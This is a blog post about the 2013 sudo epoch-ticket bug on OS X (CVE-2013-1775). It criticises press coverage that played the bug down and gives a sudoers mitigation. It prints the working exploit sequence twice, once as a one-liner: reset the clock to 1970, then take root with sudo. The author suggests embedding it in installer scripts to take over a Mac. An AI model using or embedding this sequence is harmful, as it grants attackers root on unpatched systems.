Home » Learning Curve
The 'sudo' ThingYou need a new version. There's also a temporary fix.
There's quite the commotion amongst the few who care about computer security. It's a bug in sudo that's turned into a Metasploit POC coauthored by one of the lead programmers on the sudo project. It seems to work on all platforms and it definitely works on OS X.
Epoch Ticket
The main link you need is at the official sudo website.
http://www.sudo.ws/sudo/alerts/epoch_ticket.html
Here's what's going on. Familiarity with sudo is sine qua.
Significant
This is a significant bug, as even skiddies can easily roll exploits into common applications and totally own you. You'll be none the wiser. Putting it in an Installer.app preflight or postflight script makes things even easier. Whether anybody will bother is another matter, but the exploit is both easy and deadly.
[FinFisher been using this? Ed.]
Topher Kessler wrote on 30 August that this isn't necessarily a significant bug. Bollocks. As Joel Bruner points out, it's child's play to drop a simple script onto a remote system to own it.
sudo -k
systemsetup -setusingnetworktime off
systemsetup -settimezone GMT
systemsetup -setdate 01:01:1970
systemsetup -settime 00:00
sudo -s
You have to turn off network time before proceeding to set the date or time. Following with either 'sudo su' or 'sudo -s' will give you root privileges and the system is yours.
Bruner recommends the following for those who haven't yet properly protected their systems - changing the grace period to zero. Be very careful: the slightest error can render sudo unusable. (Better to use visudo as flawed syntax will not be saved.)
sudo sh -c "echo \"Defaults:ALL timestamp_timeout=0\" >> /private/etc/sudoers"
Some writers are trying to tone things down by using constructs such as 'potential security risk'. There's nothing 'potential' about this. This is a security risk.
Others claim things like:
'... the steps needed to exploit this particular issue make it unlikely most Mac users will become victims...'
There aren't many steps. And far from all OS X users have the latest versions of anything. And it's patently easy to root a remote system with this exploit. In fact, it can all be automated. Some writers obviously don't have particularly fertile imaginations.
Try rolling this in a background NSTask or an Installer.app script, and add on whatever you want to own a Mac.
sudo -k;systemsetup -setusingnetworktime off;systemsetup -settimezone GMT;systemsetup -setdate 01:01:1970;systemsetup -settime 00:00;sudo -s
Then we have the real bottom of the barrel.
'... sudo, a Unix-based Linux command found in most Apple OS X builds...'
Dear Doofus,
It's not a 'Unix-based Linux command'. It's from my OpenBSD. And AFAIK it's been in all OS X builds.
Regards,
Theo
PS. What the F is a 'Unix-based Linux command'?
Some Systems Worse
Everyone seems to roll their own sudo these days. The more modification, the more danger. Apple muck with sudo code, and that's not good, but guess what? Others do it too - and do it worse.
http://lifehacker.com/make-sudo-sessions-last-longer-in-linux-1221545774
'When you run sudo in Ubuntu, your administrative privileges last for 15 minutes by default so you don't have to type in your password with every command. If that is too long or short for your tastes, you can change it with a simple tweak.'
Not only is the 'grace period' three times as long as with OS X, but the article explains how to make it even longer.
And they seem to have another brilliant piece on how to make your passwords visible on the same system.
http://lifehacker.com/make-password-asterisks-visible-in-your-linux-terminal-1183533223
Some of the comments on use of sudo on Ubuntu are nothing short of brilliant.
'I use passwords like 123 for my Ubuntu user account.'
'Repeated password prompts for mundane tasks in Linux drive me nuts.'
'I usually have my user set up so that I don't have to type my password at all.'
People that dumb should be forced to run Windows.
And it's also incorrect as Ars claim to call this a 'Mac bug'. It's not a 'Mac bug' - it's a sudo bug.
Waiting on a Fix
So what do you do? The bug's been found and fixed in the actual sudo code. But it's always another matter when Apple get around to looking at it, adapting it to their own code base, and sending it out. Security Update 2013-003 from August didn't seem to cover it. Time's a-wasting.
Apple have in the past dallied with critical sudo updates for over one year.
This is why it's never a good idea to muck with open source. Use open source 'as is' and let the code owners take care of the bugs. Don't modify their code. Don't create a system so far out that you need to waste crucial time readapting for each update. User security hangs in the balance.
And put date and time settings on the root account.
Joel Bruner writes again to report that the next point update of 10.8 seems to take care of 'the sudo thing', and Chris H writes to recommend simply locking date and time preferences. Thanks to both.
See Also Mitre: CVE-2013-1775 sudo: Authentication bypass when clock is reset CNET: Bug Allows for Use of Sudo Without Password Lifehacker: Make Sudo Sessions Last Longer in Linux TMO: Sudo Flaw Opens Potential Security Risk for OS X, Linux Users Ars: Unpatched Mac bug gives attackers superuser status by going back in time
|